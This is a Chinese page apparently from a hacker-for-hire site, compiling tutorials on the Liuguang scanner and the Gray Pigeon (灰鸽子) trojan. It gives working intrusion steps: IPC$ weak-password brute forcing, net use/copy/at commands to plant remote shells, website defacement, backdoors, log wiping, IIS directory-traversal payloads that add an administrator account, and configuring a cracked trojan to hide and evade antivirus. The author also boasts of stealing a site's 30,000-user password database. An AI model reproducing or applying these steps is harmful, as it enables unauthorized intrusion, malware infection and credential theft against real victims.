黑客24小时在线接单网站

破解系统,专业黑客,黑客业务,渗透接单,黑客网站

黑客流光使用说明(流光黑客软件)

本文导读目录:

求流光5.0的使用方法(要浅显易懂)

流光5.0的使用方法

1:流光概述

流光是小容的作品,这款工具可以让一个只会点击鼠标的人成为专业的黑客,这样说一点也不夸张。它可以探测POP3,FTP,HTTP,PROXY,FROM,SQL,SMTP,IPC,等各种漏洞。并针对个中漏洞设计不同的破解方案。

2:流光使用:

步骤1:打开高级扫描向导设置扫描参数

“文件”--}“高级扫描向导”

--}在“起始”/“结束”位置填入,你要扫描的IP段。

--}在“ 目标系统”中选择你要检测的操作系统。

--}在“获取主机名”、“PING检查”前面打勾

--}在“检测项目”中选择“全选”

--}然后单击“下一步”选择“标准端口扫描”

说明:“标准断口”只对常见的断口进行扫描。

“自定义”可以自己定义进行扫描。

--}然后单击“下一步” 设置好所有检测项目后点击“下一步”

--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。

步骤2:单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。

步骤3:查看扫描报告。扫描结束之后给出“HTLM”格式的报告

方法二:

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:)

流光的IPC探测:

一、目的和任务:

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程:

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

什么是IPC:

IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。

注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令,本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:

执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

9、还能做成其他的么 ?

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

10、日志清除,断开连接 :

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete

流光简介

流光4.7)一个绝好的ftp、pop3解密工具,界面豪华,功能强大!功能简介如下:1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测,消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。

流光4.7新增功能:

1、加入了本地模式,在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时,扫描的结果(*.PTR)可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES,密钥的长度最多可到192bits,保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务,新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定,控制服务和Sensor的进程名称也可以任意指定。

9、支持XP(本地模式),很快会有98/ME的版本。

我是也是新手这是我找的东西!你自己照着做几遍就会了!记得一定要清理好系统日至!!

请说明流光的适用过程

一、 流光设置 使用流光前首先要对其进行设置,流光会使用向导的方式让用户方便地设置扫描参数。 1、 在流光主界面下,通过选择“文件”-“高级扫描向导”或使用快捷键CTRL+W打开高级扫描向导,在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址,在“目标系统”中选择预检测的操作系统类型,选中“获取主机名”“PING检查”,在“检测项目”中选择“全选”。

2 、 设置好之后,点下一步,然后一步一步分别对“PORTS”“POP3”“FTP”等检测项目进行详细设置,设置完成之后,选择流光自带的用户名字典即密码字典。

3、 将各项设置完成后,然后单击完成按钮,进入“选择主机”界面,这里选择“本地主机”表示使用本机执行扫描任务。 二、 开始扫描 单击开始按钮开始进行扫描就会出现扫描界面,在扫描过程中,如果想停止,通过单击最下角的取消来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫太大的网段,如果因扫描时间过长而久等,这时候再想让流光停下来是不容易的。 三、 查看扫描报告 扫描结束之后,流光会自动打开HTML格式的扫描报告,需要指出的是,在扫描完成后,流光不仅把扫描结果整理成报告文件,而且还把可以利用的主机列在流光界面最下方。

单击主机列表中的主机便可以直接对目标主机进行连接操作,除了使用“高级扫描向导”配置高级扫描外,还可以直接选取高级扫描工具,方法是依次单击“探测”菜单中的“高级扫描工具”。

在“高级扫描设置”窗口中可以自定义设置多个选项,这里所介绍的只是流光的一小部分功能,其它一些功能以后慢慢再说吧。流光扫描器自身的设置是比较复杂的,有很多选项可以自由设定,因而也给使用者更大的发挥空间,可以根据网络和机器状况来尝试改变这些设置,提高扫描器的性能,而且流光还有详细的帮助文档。 四、 关于字典文件的说明 流光中有大量的工具供用户生成字典文件,这是由于流光开发最初是设计成为一个纯粹的暴力破解工具,所以字典工具必不可少,单击菜单栏中的工具-字典工具-黑客字典III流光版,就可以启动字典工具。

在黑客字典III流光版中有丰富的选项设置密码中的“字母”“数字”与字符,由于是中文版,用户一看就明白,设置完成后,单击“文件存放位置”标签选择字典保存的名字和位置。

一切设置无误后,单击确定按钮,出现一个预览窗口,从这里可以看到产生的字典形式,确认无误后,按开始按钮字典即可生效。

除了可以按照组合方式产生字典外,还可以按照一定规则产生字典,例如按照中文拼音的规则和英文规定等,依次选择菜单栏中的工具-字典工具-根据拼音规则命令即可进行设置。如果字典文件太大,可以拆分字典。 五、 使用流光的说明 流光一款相当知名的黑客软件,集扫描破解于一身,当扫描出目标主机的用户名时候,然后在参考这些名称配合字典文件进行猜测密码,不过这种猜测是将用户名和密码一个一个进行匹配,验证成功即成功,所以这种方式称为暴力破解。

什么是流光,有什么用,怎么用,详细有用的答案,加分

流光的IPC探测:

一、目的和任务:

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程:

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

什么是IPC:

IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。

注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令,本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:

执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

9、还能做成其他的么 ?

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

10、日志清除,断开连接 :

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete

求‘灰鸽子’‘流光’的详细使用方法!

灰鸽子 [VIP 专业版]

1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以

上的端口来完成!

2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读

取系统设定的代理服务器信息,无需用户设置!

3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的

上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专

用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用

专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。

4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都

可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性

!同时具用牵手版的搜索符合条件主机的功能:

a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人

在玩某个游戏!

b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可

以找到打开了QQ的自动上线主机有哪些了!

5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、

上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.

6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、

键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!

7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。

8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表

显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,

9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机

有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还

可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文

件。

10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第

三方软件支持!支持Windows9x/ME/2000/Xp/2003。

11.软件附带有四款实用工具:

a. EXE工具 : 可以修改任何EXE文件图标,支持真彩色!

b. 内网端口映射器 : 它允许你将局域网内的服务映射到internet上,使

你在局域网内部也能使用自动上线功能!

c. FTP服务器 : 可以开本机FTP服务!

d. Web服务器 : 可以建立一个简单的Web服务器!

12.服务端程序在 Windows 2000 / xp / 2003 可以以服务启动,支持发送多

种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以

录制为Mpeg-1文件格式.

13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!

功能简单介绍:

【1】对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制

、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用

【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共

享管理!

【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传

动作送到远程实现实时控制功能!

【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主

机进行语音对话!

【5】telnet(超级终端).

【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!

【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,

筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!

【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!

【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线

【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!

注册灰鸽子软件后享有:

⒈享用软件的所有功能,没有任何限制!

⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!

⒊可以使用我们的专用上线系统,无需其它域名和空间支持!

⒋得到我们更好的技术服务!

注:[VIP版] 包括 VIP2005、Version 1.2、Version 2.0 !

[企业版]用户只能使用企业版!不能使用其它版本!

5.加入会员后,会自动加入官方论坛。享受官方技术支持

灰鸽子第二章:好马配好鞍,服务端正确配置。

灰鸽子是一款要交钱的软件,也就是说,你使用VIP版的话是要交给作者每年几十

块钱的使用费(不作任何评论)

因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰鸽子的官方网站进

行验证,从而可以不用交钱就可以使用,

相关版本有:影子鹰破解专用版,爱儿破解版,以及华夏黑客联盟的灰鸽子

sunray破解版。

今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方

式,只可实验,不可做坏事,大家不喜欢请跳过这一章。

第一节:未雨绸缪,实验准备。

第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如

果杀毒软件监控开着的话肯定会被删除的。

第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~

第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹

式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你

的电脑让你控制了。(这一点,等一下会详细解说)

第二节:实战开始。

把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会

用到。

解压的文件里面有以下几个文件:

H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远

程控制客户端。

http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版

的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来

在本机子上建一个服务器,骗过软件的,从而达到破解的目的。

sunray.exe 这个里面其实也就只是一个host,它把http://www.huigezi.com这

个网站的域名本地解析到本机,而不是解析到官方网站。

vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会

下载这一个到客户端,用来验证用的。

其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是

(dat images login sound)我也不知道什么用的。应该是配置用的。

第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:

http://huigezi212.126.131.43:8000end

其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写

成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的

空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传

到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和

你取得连接。

第二步,首先运行 sunray.exe,然后运行 http.exe 点开始服务!

第三步,运行客户端,也就是H_Client.exe这个文件,

点击“自动上线”选项,有几个要点要说的,

1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申

请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt

(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)

2) “自动连接密码”,这个是表示你可以连接到的电脑所要用到的密

码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”

3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我

们的软件是破解版的,官方的那个服务器我们是用不了啦~~~

4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解

版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。

“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看

着办,看着喜欢就选吧~~~^_^

“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统

自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用

的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除

灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电

脑的用户都会启动木马。

“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务

器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~

“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入

IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去

改它的,默认就行。

"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本

地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就

生成了,不要运行它,运行了你就会中木马的,(不准做坏事)

软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,

然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你

可以控制这台电脑了。具体有什么内容你自己摸索,

如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~

灰鸽子第三章:服务端工作方式:

灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门

的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门

都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在

合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事

,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带

来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此

我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服

务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动

连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称

,进程隐藏方式,使用的壳,代理,图标等等。

服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒

,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

下面介绍服务端:

配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改

洌�H缓蠛诳屠�靡磺邪旆ㄓ掌�没г诵蠫_Server.exe程序。具体采用什么办法

,读者可以充分发挥想象力,这里就不赘述。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目

录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和

G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和

G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,

G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件

、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、

遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但

仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为

G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固

定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是

A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启

动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll

并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;

G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到

病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,

G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有

进程中。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数

被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸

载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互

联网上泛滥的局面。

流光是国内著名的黑客小容的作品,因为MICROSOFT把服务器做的更方便了,所以难免有些漏洞,而这些漏洞使得攻击服务器更傻瓜化了,一个好的扫描器就是能集合各种攻击方法,使攻击更高效。

通常我们做攻击的时候首先选择高级扫描,这些扫描的主要功能是,对已知网段进行扫描,针对的IIS主要漏洞包括UNICODE,和IDQ漏洞,NULL PRINT等著名的安全漏洞,我在这里不详细介绍各种漏洞的原理,我会在以后的文章中介绍,这里只是介绍流光的基本功能。

选择高级扫描以后在一些设置中需要选择系统类型,否则需要的时间过大,如下两个地方。

当你扫描了结果以后,就根据资料加一利用,流光自己提供一些工具,而且根据这些工具来进行攻击,比如UNICODE 。流光根据局通常

的漏洞来进行攻击,常见的是如下的构造"/..%c1%1c..,/..%c0%af..

但是再打了SP2的机器以后,这些单纯的漏洞都被填补上了,不用担心,还有二次解析,

简单的二次解吸是这样写的/..%255c../..%255c../winnt/system32/cmd.exe?/c+

这样就可以随便构造任何命令了,直接添加用户是不可能的,但是可以通过复制cmd.exe因为复制的命令解析不能再对输出命令

再作判断,所以经常使用的手段是each net user aaa aaa /add1.bat,each net localgroupo Administrators aaa /add1.bat

至此一个有管理员就诞生了,剩下的事情就是通过3389或者IPC来连接,你可以象操纵自己的机器一样来修理。

当然,还有其他的方法。

如果你发现一个机器开放了3389段口,那么就试图进行连接吧,连接的工具是WIN2K里面的控制面版里面的添加WIN2K组件,远程连接

终端服务,至此,就可以连接3389了。连接以后,你当然不知道密码,这个很容易实现。微软有一个人所共知的输入法漏洞,就是利用输入法中的全拼输入法,里面的输入法介绍,有一个帮助,这个东西是打开了一个CHM的东西,利用HH.EXE来浏览这个东西,HH调用的是IE的内核,可以通过跳转到任何URL来实现,跳转到硬盘,这样就可以建立,删除,修改任何硬盘上的文件。

黑客工具--流光?

【流光 2001 For NT/2000】

SQL Server扫描:速度是Sqldict的7倍。

测试一:255台主机的网段,SQL 40台,5分钟内成功得到18个SA。

测试二:255台主机的网段,SQL 38台,5分钟内成功得到12个SA。

【流影 Http Edition Beta 2】情况

流影Http Edtion Beta2的改进:

1、提高了探测速度,在我养的鸡上面,每分钟可以扫描2500次,也就是说一天可以扫描3,600,000次,大约是前版速度的5倍。

2、可以作为NT的一个Service登陆。就是可以直接用netsvc启动。

3、控制的方便性。进行修改、删除当前命令行,并且可以重复输入上一次的命令。此外登陆时密码也不再是明文显示了。

目前还需要在NT4中做一些测试,不久即可提供下载。

【流光2000 Preview 3 For NT/2000】升级

流光2000 Preview 3发布,需要先下载Preview 2 For NT/2000。修正BUG:

1、在Import时选择取消时出错的问题。

2、修正HTTP/Proxy时误报的问题。目前有一部分网站在多次探测失败时会禁止当前IP的登陆,对于目前这个问题没有太好的解决方法,唯一可以解决方法是采用一个Proxy列表自动切换。目前我没有太多的Proxy,如果您有请发给给我一份,以便我能调试。

其他:

今天突然想看看国内用户一般采用的密码是什么,于是随便挑了一个网站,经过一系列步骤登陆进去,将其用户注册数据库下载了。大约有87M(晕倒,还好是DDN上网用了大约10分钟就下载完了),有将近30000个用户和密码。于是做了一个简单的统计,使用密码最多的是0000、00000、000000、0000000、00000000、aaaa、1111.......等,其余密码85%都使用数字。我将密码整理了一遍,又需要的可以下载。

【光和影子】-流光/流影实例说明

光和影子

【流影 POP3 Edtion】发布

【流影 HTTP Edtion】发布

【流影 POP3 Edtion】使用说明

使用说明

【流影 POP3 Edtion】开发顺利

目前开发顺利,不久即可提供下载。

【流光2000】 Preview 2 (中/英文版) For Windows 98 发布

由于很多用户没有安装NT/2000,所以特别定制了一个能在98下面运行的版本,但是此版本没有IPC(Inter Process Communication)功能。

【流光2000】Preview 2 (中/英文版)For Windows NT/2000 发布

包括几个工具(在Tools目录中)以及一个关于利用2000作为跳板的说明。

【溯雪Beta7】For Windows 98/NT/2000发布

支持任意大字典,支持需要身份认证的Proxy,不再会出现假死机。

【论坛更换】

由于最近总有人在我的论坛上面捣乱,所以决定更换论坛。

【流光2000】Preview 2 中英文版将同时发布

【RunAsEx】For Windows NT 3.51/4.0/2000

用途:在Windows NT中以指定用户身份创建进程。

当我们用Srv.exe(NetCat)登录之后,发现有很多程序无法运行,例如:pwdump,尽管这个时候已经具有了Administrator的密码。

用AT命令创建的进程,Windows NT是以系统帐号的身份运行的,而不是创建者的帐号。系统帐号的权限是有限的,例如不能启动和网络相关的程序。

Windows 2000中提供了一个RunAs程序就是实现这个功能的,但是如果用Srv.exe登陆,由于无法更改回显模式而无法使用。除非使用Telnet登陆。NT4.0没有Telnet服务,所以即使将RunAs复制到NT4.0中,也会因为前面说的原因无法使用。所以特地写了一个小工具RunAsEx。

RunAsEx可以适用于NT4.0/2000,可以在Srv.exe登陆的连接中使用。

RunAsEx UserName Password Execute File ["Execute Option"]

UserName 运行创建程序的用户名称

Password 创建程序的用户密码,如果密码为空,以*号代替。

Execute File 可执行文件名,必须为全路径,带后缀。

["Execute Option"] 可执行文件的命令行选项,如果无需选项,此项可以不填。选项必须以"开始和结束。

例如:

RunAsEx Administrator password \winnt\pwdump.exe "pwd.txt"

RunAsEx Administrator password \winnt\system32\net.exe "user Hakcer /add"

注意:此工具不能在本地运行

可在【小榕作品】中下载。

【流光 2000】For Windows 2000/NT Preview 2 Update

修正Socket超时及线程同步问题,线程可以更加稳定运行。

【流光 2000】For Windows 2000/NT 4.0 Preview 1 Announced

可以在Windows 2000及Windows NT 4.0中运行,但是没有在NT4.0中做过测试。

不能运行于Windows 9.x。

可以运行于局域网,但是IPC$探测功能对国内IP保留。

建议不要强制退出,否则会导致内存泄漏(Memory Leak)。

【流光 2000】将会发布一个英文版。

【溯雪】Beta 7稍后发布。

一年前的今天,【流光1.0】问世,在随后一年的时间里又经历了1.1、1.12、1.13、1.25、1.27、2.0、2.5、2.5SE、3.0等版本,代码由7,000行发展到76,000行,目前用户数将近400,000。开发正因为有了这么多朋友的支持,我才得以坚持做下去。在此,小榕深表感谢!

请到【小榕作品】下载。

------------------

用许多的时间去后悔,不如再开始新的努力!

我是一只大大大鸵鸟,想要飞也飞也飞不高!

  • 评论列表:
  •  黑客技术
     发布于 2022-06-05 03:51:16  回复该评论
  • 初学者都能充当黑客。当使用在 合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事 ,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带 来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此
  •  黑客技术
     发布于 2022-06-04 23:41:22  回复该评论
  • 版,用户一看就明白,设置完成后,单击“文件存放位置”标签选择字典保存的名字和位置。 一切设置无误后,单击确定按钮,出现一个预览窗口,从这里可以看到产生的

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.